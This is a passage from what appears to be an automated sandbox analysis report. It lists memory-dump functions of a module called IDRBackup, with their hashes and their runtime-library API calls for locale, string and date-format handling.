                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f1e47844cd93ca84784c79f7d341b9e053281c3b4133cae1a5c05864f54e258f
                                                                                                  • Instruction ID: 7473588c50868cdd4cf269cefb6fabf10eaf1346cbac2aa0736d0132a9a779a0
                                                                                                  • Opcode Fuzzy Hash: f1e47844cd93ca84784c79f7d341b9e053281c3b4133cae1a5c05864f54e258f
                                                                                                  • Instruction Fuzzy Hash: AB01F29260D3D22ECB43863898AD9477E690E5742430F89DF9CD9EF157E6848806C376
                                                                                                  Function 5000F444 Relevance: .0, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8a73dba0381db9dbe2b330d1731483e2c560fe39a4457131bb36ff6936a4f83e
                                                                                                  • Instruction ID: affd36c6c64f70e4dee5fbd6358e9c8d13ad5ec6fb3142a69267087980e65f6e
                                                                                                  • Opcode Fuzzy Hash: 8a73dba0381db9dbe2b330d1731483e2c560fe39a4457131bb36ff6936a4f83e
                                                                                                  • Instruction Fuzzy Hash: D901D49260D3D22ECB43C63C98AD9477E690E5743430F89DF98D9EF557E6848806C376
                                                                                                  Function 5000F05C Relevance: .0, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4a32254a26ec7745de881303c7ac90fb81c22ee6ef5ce8fe5113023a79fea4d0
                                                                                                  • Instruction ID: 919b428233cae173511029aa0f2b27a77bfc61ebef004b7e03d13958cfa4ce04
                                                                                                  • Opcode Fuzzy Hash: 4a32254a26ec7745de881303c7ac90fb81c22ee6ef5ce8fe5113023a79fea4d0
                                                                                                  • Instruction Fuzzy Hash: ACF045A160D3C26ED747AB7898AD993BF284F4312030F84DBD885DF0A7E2905406D736
                                                                                                  Function 50029078 Relevance: 77.2, APIs: 38, Strings: 6, Instructions: 212threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsValidLocale.KERNEL32(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002909F
                                                                                                  • GetThreadLocale.KERNEL32(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290AC
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290C9
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290D4
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290E9
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290F3
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002910A
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029114
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029127
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002913B
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029154
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002915E
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029171
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002918A
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291A0
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291B5
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291CB
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291DB
                                                                                                    • Part of subcall function 50025BC4: GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,50028D40,00000000,50028F6A,?,?,00000000,00000000), ref: 50025BD7
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291F4
                                                                                                    • Part of subcall function 50025B78: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                    • Part of subcall function 50025B78: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291FF
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029214
                                                                                                    • Part of subcall function 50025B78: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,00000100), ref: 50025BB5
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002921F
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029229
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029233
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029248
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029252
                                                                                                    • Part of subcall function 5001B4C8: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120(?,00000001,50025F1B,00000000,50025F3D,?,?,?,00000000), ref: 5001B4CE
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029263
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029272
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029287
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029291
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292AA
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292B4
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292C5
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292D4
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,:mm,?,?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292EF
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,:mm:ss,?,?,?,:mm,?,?,?,00000001,00000000,5002933E), ref: 5002930A
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,:mm:ss,?,?,?,:mm,?,?,?,00000001,00000000,5002933E), ref: 5002931A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$String$Sysutils@$Locale$System@@$Asg$qqrr20Stringx20$Str$qqriix20$Def$qqrx20Stringi$Char$qqriib$FreeInfoMem$qqrpvN$qqrv$CharFromLen$qqrr20Long$qqrx20Move$qqrpxvpviString$qqriStringpbiStringriThreadValid
                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                  • API String ID: 1591733115-2493093252
                                                                                                  • Opcode ID: d39b3aeaf06a43d5e51a57cb72a8f0b0344bee30f2a786df34325c6a8d5a2eb3
                                                                                                  • Instruction ID: c56b8177db0a57ba453c3af60c07cd0ceb7fdab362b64694d1a226fae421d36e
                                                                                                  • Opcode Fuzzy Hash: d39b3aeaf06a43d5e51a57cb72a8f0b0344bee30f2a786df34325c6a8d5a2eb3
                                                                                                  • Instruction Fuzzy Hash: 047158317022CA9BDF01DBE4F891ADEB3BADF98300F908637B105AB656D635DD058794
                                                                                                  Function 50028C8C Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 203threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(00000000,50028F6A,?,?,00000000,00000000), ref: 50028CC2
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028CD6
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028CE3
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028CF8
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D02
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028D1C
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D26
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D3B
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D51
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028D6C
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D76
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028D8B
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028DA6
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028DBE
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028DD3
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028DEB
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028DFB
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028E16
                                                                                                    • Part of subcall function 50025B78: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                    • Part of subcall function 50025B78: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E23
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028E38
                                                                                                    • Part of subcall function 50025B78: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,00000100), ref: 50025BB5
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E45
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E4F
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E59
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028E6E
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E78
                                                                                                    • Part of subcall function 5001B4C8: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120(?,00000001,50025F1B,00000000,50025F3D,?,?,?,00000000), ref: 5001B4CE
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E89
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028E98
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028EAD
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028EB7
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028ED0
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028EDA
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028EEB
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50028F6A,?,?,00000000,00000000), ref: 50028EFA
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,:mm,?,?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028F17
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,:mm:ss,?,?,?,:mm,?,?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028F34
                                                                                                  • @Sysutils@GetLocaleChar$qqriib.RTL120(?,:mm:ss,?,?,?,:mm,?,?,00000000,50028F6A,?,?,00000000,00000000), ref: 50028F44
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$String$Sysutils@$System@@$Locale$Asg$qqrr20Stringx20$Str$qqriix20$Def$qqrx20Stringi$Char$qqriib$FreeMem$qqrpvN$qqrv$CharFromInfoLen$qqrr20Long$qqrx20Move$qqrpxvpviString$qqriStringpbiStringriThread
                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                  • API String ID: 2238068362-2493093252
                                                                                                  • Opcode ID: 578a5909f94e02bd4f20fe4711f945c39aa07445c328b27e69a5ead81c01f26d
                                                                                                  • Instruction ID: a8aad9425a59888f8c7a4424cecd7dbef86d1a9361a3f9030e8a3f94b0420b5d
                                                                                                  • Opcode Fuzzy Hash: 578a5909f94e02bd4f20fe4711f945c39aa07445c328b27e69a5ead81c01f26d
                                                                                                  • Instruction Fuzzy Hash: 0E7170346031CA9BEF41EBE4FC916DE737A9F98300F908636F100AB256DB39D94587A4
                                                                                                  Function 50026004 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 177threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026036
                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002603F
                                                                                                  • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002604E
                                                                                                    • Part of subcall function 50025B78: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                    • Part of subcall function 50025B78: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                  • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002605B
                                                                                                    • Part of subcall function 5001B4C8: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120(?,00000001,50025F1B,00000000,50025F3D,?,?,?,00000000), ref: 5001B4CE
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260A5
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260AF
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260B8
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260BD
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260D0
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500260F2
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@CharLength$qqrx20System@UnicodeStringi.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026110
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002612B
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026135
                                                                                                  • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026153
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026163
                                                                                                  • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002617F
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5002618F
                                                                                                    • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                    • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                    • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                    • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                  • @Sysutils@StrLIComp$qqrpxbt1ui.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500261AA
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 500261BA
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026202
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50026237,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 50026207
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
